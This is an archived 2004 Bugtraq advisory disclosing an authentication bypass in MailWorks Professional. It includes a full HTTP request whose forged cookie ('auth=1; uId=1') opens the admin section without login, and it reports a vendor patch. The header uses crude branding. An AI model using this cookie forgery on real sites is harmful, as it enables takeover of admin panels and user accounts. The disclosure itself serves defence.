lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <15165.203.99.28.57.1094110951.squirrel@203.99.28.57>
Date: Thu, 2 Sep 2004 19:42:31 +1200 (NZST)
From: headpimp@...p-industries.com
To: bugtraq@...urityfocus.com
Subject: MailWorks Professional - Authentication Bypass


                Pimp industries.
   "Its all about the Bling, B^!%@s and Fame!"

     MailWorks Professional All versions
     Authentication bypass via cookie control

       (C) Paul Craig - Pimp Industries 2004


Background
-------------
MailWorks Professional is a mailing list management application, developed
by sitecubed. It provides an easy way for e-zines or newsletters to manage
large amounts of contacts and distribute newsletters among them. It’s
reasonably popular with many websites and has been around for a while.


Exploit:
-------------
C really is for cookie and in this case, MailWorks Pro has a rather
trivial session check that is easily bypassed within a cookie. The exploit
allows an attacker to have full control over the administration section,
without the need to authenticate and allowing the attacker to spoof the
admin user functions.
An example HTTP packet is below

GET /mwadmin/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/msword, application/x-shockw
ave-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR
1.1.4322)
Host: www.example.com
Content-Length: 570
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: auth=1; uId=1


The cookie contains the exploit, auth=1 (to signify that you have logged
in) and uId= the id of the user you want to be, by default uId=1 is user
"admin".
This request will show the index page for user “Admin”, instead of the
usual “Please Login” page.

This can be further exploited by sending a HTTP post to add a new user
with full admin rights, from there the attacker can login as a legitimate
admin user.


Suggestions/Work Around:
-------------
Sitecubed was contacted early this morning; they responded very quickly
and have released a patch for all customers that is available on their
website.
Well done Sitecubed for being prompt!


Company status
---------------
Pimp Industries is a privately owned security research company. If you
would like to contact Pimp Industries to discuss any nature of business,
please email us at headpimp@...p-industries.com.



Paul Craig
Head Pimp, Security Researcher
Pimp Industries
"Move Fast, Think faster"




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ